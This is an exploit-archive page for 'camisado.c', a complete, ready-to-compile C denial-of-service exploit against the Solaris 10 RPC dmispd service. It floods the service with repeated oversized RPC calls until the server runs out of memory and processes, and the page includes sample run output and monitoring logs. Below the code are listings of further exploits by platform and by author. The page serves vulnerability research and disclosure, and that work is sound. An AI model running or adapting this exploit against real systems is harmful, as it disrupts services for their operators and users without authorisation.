Menu

Search for hundreds of thousands of exploits

"Sun Solaris 10 RPC dmispd - Denial of Service"

Author

Exploit author

"Jeremy Brown"

Platform

Exploit platform

solaris

Release date

Exploit published date

2009-09-24

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
/*
camisado.c
AKA
Sun Solaris 10 RPC dmispd Remote Resource Consumption Exploit

Jeremy Brown [0xjbrown41@gmail.com//jbrownsec.blogspot.com//krakowlabs.com] 09.24.2009

***************************************************************************************************************
Another long night in ONC RPC fuzzing land...

# uname -a
SunOS unknown 5.10 Generic_139555-08 sun4u sparc SUNW,Ultra-5_10
# svcadm restart dmi
# date;sh stat.sh;date
Thursday, September 24, 2009  1:47:22 AM EDT
 18651 root     3584K 2080K sleep   59    0   0:00:00 0.1% dmispd/1
 18651 root     1047M   50M run      9    0   0:00:00 2.8% dmispd/1
 18651 root     1047M  132M run      0    0   0:00:01 7.2% dmispd/1
 18651 root     1047M  212M run      0    0   0:00:02  11% dmispd/1
 18651 root     1047M  292M run     50    0   0:00:03  15% dmispd/1
 18651 root     1047M  375M run     40    0   0:00:04  19% dmispd/1
 18651 root     1047M  455M run     30    0   0:00:05  23% dmispd/1
 18651 root     1047M  525M run     40    0   0:00:06  26% dmispd/1
 18651 root     1047M  527M run     45    0   0:00:06  25% dmispd/1
 18651 root     1047M  531M run     52    0   0:00:06  25% dmispd/1
 18651 root     1047M  543M run     31    0   0:00:07  26% dmispd/1
 18651 root     1047M  550M run     51    0   0:00:07  26% dmispd/1
 18651 root     1047M  551M run     42    0   0:00:07  25% dmispd/1
 18651 root     1047M  552M sleep   60    0   0:00:07  25% dmispd/1
 18651 root     1047M  553M sleep   60    0   0:00:08  25% dmispd/1
 18651 root     1047M  552M run     43    0   0:00:08  24% dmispd/1
 18651 root     1047M  551M sleep   59    0   0:00:17  14% dmispd/1
 18651 root     1047M  545M sleep   59    0   0:00:17  13% dmispd/1
^CThursday, September 24, 2009  1:48:47 AM EDT
#

And also...

# while true;do ps -AZfl | grep dmispd;sleep 1;done
 0 S   global    root 19477     1   0  40 20        ?    448        ? 13:25:10 ?           0:00 /usr/lib/dmi/dmispd
 0 S   global    root 19479 17588   0  40 20        ?    208        ? 13:35:27 pts/3       0:00 grep dmispd
 0 R   global    root 19477     1   4  89 20        ? 134073          13:25:10 ?           0:01 /usr/lib/dmi/dmispd
 0 R   global    root 19477     1   8  89 20        ? 134073          13:25:10 ?           0:02 /usr/lib/dmi/dmispd
 0 R   global    root 19477     1  12  99 20        ? 134073          13:25:10 ?           0:03 /usr/lib/dmi/dmispd
 0 R   global    root 19477     1  16  99 20        ? 134073          13:25:10 ?           0:04 /usr/lib/dmi/dmispd
 0 R   global    root 19477     1  20  99 20        ? 134073          13:25:10 ?           0:05 /usr/lib/dmi/dmispd
 0 R   global    root 19477     1  24  59 20        ? 134073          13:25:10 ?           0:06 /usr/lib/dmi/dmispd
 0 R   global    root 19497 17588   0  44 20        ?    206          13:35:34 pts/3       0:00 grep dmispd
bash: fork: Resource temporarily unavailable
#

linux@ubuntu:~$ ./camisado

Sun Solaris 10 RPC dmispd Remote Resource Consumption Exploit
Usage: ./camisado <target>

linux@ubuntu:~$ ./camisado 192.168.0.236

Sun Solaris 10 RPC dmispd Remote Resource Consumption Exploit

Consuming Resources @ 192.168.0.236 [P:300598 V:1 F:523]...

--> #1
rpc: RPC: Timed out
--> #2
rpc: RPC: Timed out
--> #3
rpc: RPC: Timed out
--> #4
rpc: RPC: Timed out
--> #5
rpc: RPC: Timed out
--> #6
rpc: RPC: Timed out
--> #7
rpc: RPC: Timed out

Finished. Now your sun server may recover :)

linux@ubuntu:~$

As far as I know, the RPC service "dmispd" is enabled by default on Solaris 10 (SPARC tested). It should render
the server unuseable for ~1-2 minutes. I'm not estatic about that part either. Fun to play with if nothing else.
And, If someone is interested in auditing RPC, this could be a good example to learn from. Learning isn't lame ;)
***************************************************************************************************************
camisado.c
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/time.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <errno.h>

#define PROG_NUM 300598
#define PROG_VER 1
#define DMIPROC_ADDROW 523

#define SIZE 100
#define LOOP 7

int main(int argc, char *argv[])
{

char b[SIZE], *buf, *target = argv[1];
int i, usock = RPC_ANYSOCK;

struct hostent *hp;
struct sockaddr_in us;

struct timeval tm={10, 0};

CLIENT *cli;
enum clnt_stat clnt_stat;

if(argc < 2)
{

     printf("\nSun Solaris 10 RPC dmispd Remote Resource Consumption Exploit\n");
     printf("Usage: %s <target>\n\n", argv[0]);

     return 0;

}

     printf("\nSun Solaris 10 RPC dmispd Remote Resource Consumption Exploit\n");

if((hp = gethostbyname(target)) == NULL)
{

     perror("gethostbyname");
     exit(-1);

}

     memcpy(&us.sin_addr.s_addr, hp->h_addr, 4);

us.sin_family = AF_INET;
us.sin_port   = 0;

if((cli = clntudp_create(&us, PROG_NUM, PROG_VER, tm, &usock)) == (CLIENT *)NULL)
{

     clnt_pcreateerror("clntudp_create");
     exit(-1);

}

cli->cl_auth = authunix_create_default();

     memset(b, 'A', sizeof(b));

buf = b;

     printf("\nConsuming Resources @ %s [P:%d V:%d F:%d]...\n\n", target, PROG_NUM, PROG_VER, DMIPROC_ADDROW);

for(i = 0; i < LOOP; i++)
{

     printf("--> #%d\n", i+1);

clnt_stat = clnt_call(cli, DMIPROC_ADDROW, (xdrproc_t)xdr_wrapstring, (char *)&buf, (xdrproc_t)xdr_wrapstring, (char *)&buf, tm);

if(clnt_stat != RPC_SUCCESS) clnt_perror(cli, "rpc");

}

     printf("\nFinished. Now your sun server may recover :)\n\n"); // restart dmi services to try again

     auth_destroy(cli->cl_auth);
     clnt_destroy(cli);

}
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-04-21 "Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation" local solaris "Marco Ivaldi"
2019-10-21 "Solaris 11.4 - xscreensaver Privilege Escalation" local solaris "Marco Ivaldi"
2019-10-16 "Solaris xscreensaver 11.4 - Privilege Escalation" local solaris "Marco Ivaldi"
2019-05-20 "Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)" local solaris "Marco Ivaldi"
2019-05-20 "Solaris 10 1/13 (Intel) - 'dtprintinfo' Local Privilege Escalation" local solaris "Marco Ivaldi"
2019-05-20 "Solaris 7/8/9 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1)" local solaris "Marco Ivaldi"
2019-01-14 "xorg-x11-server < 1.20.3 - Local Privilege Escalation (Solaris 11 inittab)" local solaris "Marco Ivaldi"
2018-10-16 "Solaris - RSH Stack Clash Privilege Escalation (Metasploit)" local solaris Metasploit
2018-09-25 "Solaris - 'EXTREMEPARR' dtappgather Privilege Escalation (Metasploit)" local solaris Metasploit
2018-09-18 "Solaris - libnspr NSPR_LOG_FILE Privilege Escalation (Metasploit)" local solaris Metasploit
Release Date Title Type Platform Author
2019-10-15 "Podman & Varlink 1.5.1 - Remote Code Execution" remote linux "Jeremy Brown"
2019-10-14 "Ajenti 2.1.31 - Remote Code Execution" webapps python "Jeremy Brown"
2016-12-06 "Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (PoC)" dos windows "Jeremy Brown"
2016-12-04 "BlackStratus LOGStorm 4.5.1.35/4.5.1.96 - Remote Code Execution" remote hardware "Jeremy Brown"
2015-06-10 "Libmimedir - '.VCF' Memory Corruption (PoC)" dos linux "Jeremy Brown"
2015-06-03 "Seagate Central 2014.0410.0026-F - Remote Facebook Access Token" webapps hardware "Jeremy Brown"
2015-06-03 "Seagate Central 2014.0410.0026-F - Remote Command Execution" remote hardware "Jeremy Brown"
2015-05-20 "Comodo GeekBuddy < 4.18.121 - Local Privilege Escalation" local windows "Jeremy Brown"
2015-01-28 "ClearSCADA - Remote Authentication Bypass" remote windows "Jeremy Brown"
2011-06-07 "IBM Tivoli Endpoint 4.1.1 - Remote SYSTEM" remote windows "Jeremy Brown"
2011-03-23 "IGSS 8 ODBC Server - Multiple Remote Uninitialized Pointer Free Denial of Service Vulnerabilities" dos windows "Jeremy Brown"
2011-03-23 "Progea Movicon 11 - 'TCPUploadServer' Remote File System" remote windows "Jeremy Brown"
2011-01-25 "Automated Solutions Modbus/TCP OPC Server - Remote Heap Corruption (PoC)" dos windows "Jeremy Brown"
2011-01-14 "Objectivity/DB - Lack of Authentication" dos windows "Jeremy Brown"
2010-12-18 "Ecava IntegraXor Remote - ActiveX Buffer Overflow (PoC)" dos windows "Jeremy Brown"
2010-09-16 "BACnet OPC Client - Local Buffer Overflow (1)" local windows "Jeremy Brown"
2009-12-12 "Mozilla Codesighs - Memory Corruption" local linux "Jeremy Brown"
2009-12-07 "Polipo 1.0.4 - Remote Memory Corruption (PoC)" dos linux "Jeremy Brown"
2009-12-07 "gAlan 0.2.1 - Local Buffer Overflow (1)" local windows "Jeremy Brown"
2009-11-16 "Apple Safari 4.0.3 (Windows x86) - 'CSS' Remote Denial of Service (1)" dos windows_x86 "Jeremy Brown"
2009-10-28 "Mozilla Firefox 3.5.3 - Local Download Manager Temp File Creation" local windows "Jeremy Brown"
2009-10-06 "Geany .18 - Local File Overwrite" local linux "Jeremy Brown"
2009-09-24 "Sun Solaris 10 RPC dmispd - Denial of Service" dos solaris "Jeremy Brown"
2009-09-09 "GemStone/S 6.3.1 - 'stoned' Local Buffer Overflow" local linux "Jeremy Brown"
2009-09-09 "Ipswitch WS_FTP 12 Professional - Remote Format String (PoC)" dos windows "Jeremy Brown"
2009-09-09 "Apple Safari 3.2.3 (Windows x86) - JavaScript 'eval' Remote Denial of Service" dos windows_x86 "Jeremy Brown"
2009-07-21 "Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation" local windows "Jeremy Brown"
2009-05-07 "GrabIt 1.7.2x - NZB DTD Reference Buffer Overflow" local windows "Jeremy Brown"
2009-03-12 "POP Peeper 3.4.0.0 - Date Remote Buffer Overflow" remote windows "Jeremy Brown"
2009-02-27 "POP Peeper 3.4.0.0 - UIDL Remote Buffer Overflow (SEH)" remote windows "Jeremy Brown" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected